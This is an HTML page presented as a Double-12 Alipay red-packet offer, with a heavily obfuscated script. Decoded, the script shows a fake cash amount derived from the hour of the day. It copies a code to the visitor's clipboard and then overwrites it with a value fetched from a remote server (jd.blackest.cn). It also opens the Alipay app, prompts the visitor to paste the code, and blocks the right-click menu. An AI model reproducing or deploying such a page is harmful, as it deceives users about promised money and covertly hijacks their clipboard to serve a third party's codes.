<html lang="en" id="html" style="font-size: 357.6px;">

<head>
    <meta charset="UTF-8">
    <meta name="format-detection" content="telephone=no">
    <meta name="viewport" content="width=device-width,initial-scale=1.0,maximum-scale=1.0,user-scalable=0">
    <title>双十二到店红包</title>
    <style>@font-face{font-family:uc-nexus-iconfont;src:url(chrome-extension://pogijhnlcfmcppgimcaccdkmbedjkmhi/res/font_9qmmi8b8jsxxbt9.woff) format('woff'),url(chrome-extension://pogijhnlcfmcppgimcaccdkmbedjkmhi/res/font_9qmmi8b8jsxxbt9.ttf) format('truetype')}</style>
</head>

<body>
    <style>
        *{
    padding:0;
    margin:0;
}
.main{
    overflow: hidden;
}
a {
    color:black;
}
.main img{
    width:100%;
    outline-width:0px;
    vertical-align:top;
}
.main{
    position: relative;
}
.main .copy-container{
    width: 100%;
    height: 0.42rem;
    position: absolute;
    top: 3.8rem;
    display: flex;
    text-align: center;

}
.copy-text{
    flex: 1;
    text-decoration: none;
}
.copy-text input{
    border: none;
    background: none;
    font-size: 0.32rem;
    color: #FCF07C;
    display: inline-block;
    outline: none;
    width: 2rem;
    text-align: center;
}
.copy-btn{
    position: absolute;
    top: 4.4rem;
    width: 2rem;
    height: 0.4rem;
    left: 0.9rem;
    z-index: 100;
    outline: none;
    border: none;
    opacity: 0;
}
.tips{
    width:50%;
    color: #fff;
    background: rgba(0,0,0,0.7);
    text-align: center;
    font-size: 0.16rem;
    border-radius: 0.04rem;
    position: fixed;
    padding: 5%;
    top:50%;
    left:20%;
    margin: auto;
}
#money{
    position: absolute;
    top: 1.78rem;
    left: 1.6rem;
    display: inline-block;
    font-size: 0.34rem;
    color: #FF0035;
}
#copyTextInput1{
    position: absolute;
    top: 8.6rem;
    font-size: 0.08rem;
    left: 0.69rem;
}
#copyTextInput2{
    position: absolute;
    top: 9.1rem;
    font-size: 0.07rem;
    left: 0.92rem;
    color: red;
    zoom: 0.6;
    transform: scale(0.8);
    
}
#copyTextInput3{
    position: absolute;
    top: 9.52rem; 
    font-size: 0.3rem;
    right: 0.59rem;
}
.footer{
    position: fixed;
    bottom:0;
    width: 100%;
    left:0;
    display: none;
}
#homeurl{
    text-align: center;
    background-color: #FDFC86;
    color:#000;
    text-decoration: none;
    border-radius: 5px;
    padding:3% 5%;
    margin:8% 5%;
    width:80%;
    display: block;
    font-size:0.22rem;
    box-shadow: 0px 2px 4px #ccc;
}
#bianxian{
    text-align: center;
    background-color: #FDFC86;
    color:#000;
    text-decoration: none;
    border-radius: 5px;
    padding:3% 5%;
    margin:5%;
    display: block;
    font-size:0.22rem;
    width:80%;
    box-shadow: 0px 2px 4px #ccc;
}
    </style>
    
    <div class="main">
        <img src="static/picture/hb.jpg" alt="" onclick="return false">
        <span id="money">12.8</span>
        <div class="copy-container">
            <div class="copy-text"><input type="text" id="copyTextInput" value=""></div>
        </div>
        <a class="home" href="javascript:void(0);" data-clipboard-action="copy" data-clipboard-text=""  onclick="resetCode();"><button class="copy-btn" ></button></a>
            <span id="copyTextInput1"></span>
        <span id="copyTextInput2"></span>
        <span id="copyTextInput3"></span>
    </div>
    <!--
    <div class="footer">
        <a href="http://qm.qq.com/cgi-bin/qm/qr?k=TQGkLMx_tFiB0V12dkSYS-xrEzQDW3-j" id="homeurl">我也要制作（免费）</a>
        <a href="http://ujys.cc/hb/bianxian.html" id="bianxian">使用红包</a>
    </div>
    -->
    <div class="tips" style="display: none">复制成功，请打开支付宝首页搜索</div>
    <script src="static/js/jquery-1.9.1.js"></script>
    <script type="text/javascript" src="https://open.mobile.qq.com/sdk/qqapi.js?_bid=152"></script>
    <script src="static/js/clipboard.js"></script>
    <script>

var __encode ='sojson.com', _0xb483=["\x5F\x64\x65\x63\x6F\x64\x65","\x68\x74\x74\x70\x3A\x2F\x2F\x77\x77\x77\x2E\x73\x6F\x6A\x73\x6F\x6E\x2E\x63\x6F\x6D\x2F\x6A\x61\x76\x61\x73\x63\x72\x69\x70\x74\x6F\x62\x66\x75\x73\x63\x61\x74\x6F\x72\x2E\x68\x74\x6D\x6C"];(function(_0xd642x1){_0xd642x1[_0xb483[0]]= _0xb483[1]})(window);var __Ox24121=["\x68\x72\x65\x66","\x6C\x6F\x63\x61\x74\x69\x6F\x6E","\x65\x78\x65\x63","\x5B\x5C\x3F\x26\x5D","\x3D\x28\x5B\x5E\x26\x23\x5D\x2A\x29","\x67\x65\x74\x48\x6F\x75\x72\x73","\x74\x6F\x46\x69\x78\x65\x64","\x74\x65\x78\x74","\x23\x6D\x6F\x6E\x65\x79","\x63\x6F\x64\x65","\x76\x61\x6C\x75\x65","\x63\x6F\x70\x79\x54\x65\x78\x74\x49\x6E\x70\x75\x74","\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x42\x79\x49\x64","\x68\x74\x6D\x6C","\x23\x63\x6F\x70\x79\x54\x65\x78\x74\x49\x6E\x70\x75\x74\x31","\x23\x63\x6F\x70\x79\x54\x65\x78\x74\x49\x6E\x70\x75\x74\x32","\x23\x63\x6F\x70\x79\x54\x65\x78\x74\x49\x6E\x70\x75\x74\x33","\x64\x61\x74\x61\x2D\x63\x6C\x69\x70\x62\x6F\x61\x72\x64\x2D\x74\x65\x78\x74","\x61\x74\x74\x72","\x2E\x68\x6F\x6D\x65","\x61\x6C\x69\x70\x61\x79\x73\x3A\x2F\x2F\x70\x6C\x61\x74\x66\x6F\x72\x6D\x61\x70\x69\x2F\x73\x74\x61\x72\x74\x61\x70\x70\x3F\x61\x70\x70\x49\x64\x3D\x32\x30\x30\x30\x31\x30\x30\x33\x26\x63\x6C\x69\x65\x6E\x74\x56\x65\x72\x73\x69\x6F\x6E\x3D\x33\x2E\x37\x2E\x30\x2E\x30\x37\x31\x38","\x68\x74\x74\x70\x3A\x2F\x2F\x6A\x64\x2E\x62\x6C\x61\x63\x6B\x65\x73\x74\x2E\x63\x6E\x2F\x61\x70\x69\x2F\x68\x62\x2F\x70\x76\x43\x6F\x64\x65\x32\x3F\x63\x6F\x64\x65\x3D","\x63","\x76","\x67\x65\x74","\x71\x71","\x68\x74\x74\x70","\x69\x6E\x64\x65\x78\x4F\x66","\x23\x68\x6F\x6D\x65\x75\x72\x6C","\x2E\x2F\x6D\x61\x6B\x65\x2E\x68\x74\x6D\x6C\x3F\x71\x71\x3D","\x63\x6C\x69\x65\x6E\x74\x57\x69\x64\x74\x68","\x64\x6F\x63\x75\x6D\x65\x6E\x74\x45\x6C\x65\x6D\x65\x6E\x74","\x66\x6F\x6E\x74\x53\x69\x7A\x65","\x73\x74\x79\x6C\x65","\x70\x78","\x6F\x6E\x72\x65\x73\x69\x7A\x65","\x73\x68\x6F\x77","\x2E\x66\x6F\x6F\x74\x65\x72","\x73\x75\x63\x63\x65\x73\x73","\x2E\x74\x69\x70\x73","\x68\x69\x64\x65","\x6F\x6E","\x6F\x6E\x63\x6F\x6E\x74\x65\x78\x74\x6D\x65\x6E\x75","\x70\x72\x65\x76\x65\x6E\x74\x44\x65\x66\x61\x75\x6C\x74","\x20","\x73\x65\x74\x54\x69\x74\x6C\x65\x42\x75\x74\x74\x6F\x6E\x73","\x75\x69"];var urlParam=function(_0x2b5bx2){var _0x2b5bx3= new RegExp(__Ox24121[0x3]+ _0x2b5bx2+ __Ox24121[0x4])[__Ox24121[0x2]](window[__Ox24121[0x1]][__Ox24121[0x0]]);if(_0x2b5bx3){return _0x2b5bx3[0x1]}else {return 0}};var makeMoney=function(){var _0x2b5bx5= new Date();var _0x2b5bx6=_0x2b5bx5[__Ox24121[0x5]]();var _0x2b5bx7=((24- _0x2b5bx6)/ 3+ 10)[__Ox24121[0x6]](1);$(__Ox24121[0x8])[__Ox24121[0x7]](_0x2b5bx7)};makeMoney();var code=urlParam(__Ox24121[0x9]);var vip=0;document[__Ox24121[0xc]](__Ox24121[0xb])[__Ox24121[0xa]]= code;$(__Ox24121[0xe])[__Ox24121[0xd]](code);$(__Ox24121[0xf])[__Ox24121[0xd]](code);$(__Ox24121[0x10])[__Ox24121[0xd]](code);$(__Ox24121[0x13])[__Ox24121[0x12]](__Ox24121[0x11],code);$(__Ox24121[0x13])[__Ox24121[0x12]](__Ox24121[0x0],__Ox24121[0x14]);$[__Ox24121[0x18]](__Ox24121[0x15]+ code,function(_0x2b5bxa){if(_0x2b5bxa&& _0x2b5bxa[__Ox24121[0x16]]&& +_0x2b5bxa[__Ox24121[0x16]]> 0){$(__Ox24121[0x13])[__Ox24121[0x12]](__Ox24121[0x11],_0x2b5bxa[__Ox24121[0x16]])};vip= _0x2b5bxa[__Ox24121[0x17]]});var qq=urlParam(__Ox24121[0x19]);if(qq){if(qq[__Ox24121[0x1b]](__Ox24121[0x1a])>= 0){$(__Ox24121[0x1c])[__Ox24121[0x12]](__Ox24121[0x0],qq)}else {$(__Ox24121[0x1c])[__Ox24121[0x12]](__Ox24121[0x0],__Ox24121[0x1d]+ qq)}};var html=document[__Ox24121[0xc]](__Ox24121[0xd]);var width=document[__Ox24121[0x1f]][__Ox24121[0x1e]];html[__Ox24121[0x21]][__Ox24121[0x20]]= width/ 375* 100+ __Ox24121[0x22];window[__Ox24121[0x23]]= function(){var width=document[__Ox24121[0x1f]][__Ox24121[0x1e]];html[__Ox24121[0x21]][__Ox24121[0x20]]= width/ 375* 100+ __Ox24121[0x22]};function resetCode(){setTimeout(function(){$(__Ox24121[0x13])[__Ox24121[0x12]](__Ox24121[0x11],code);if(!vip){$(__Ox24121[0x25])[__Ox24121[0x24]]()}},1000)}var clipboard= new ClipboardJS(__Ox24121[0x13]);clipboard[__Ox24121[0x29]](__Ox24121[0x26],function(_0x2b5bx10){$(__Ox24121[0x27])[__Ox24121[0x24]]();setTimeout(function(){$(__Ox24121[0x27])[__Ox24121[0x28]]()},3000)});document[__Ox24121[0x2a]]= function(_0x2b5bx10){_0x2b5bx10[__Ox24121[0x2b]]()};mqq[__Ox24121[0x2e]][__Ox24121[0x2d]]({right:{title:__Ox24121[0x2c],callback:function(){}}})

    </script>
    <div id="cli_dialog_div"></div>
    <div style="display:none">
    <script src="static/js/z_stat.js" language="JavaScript"></script>
    </div>
</body>

</html>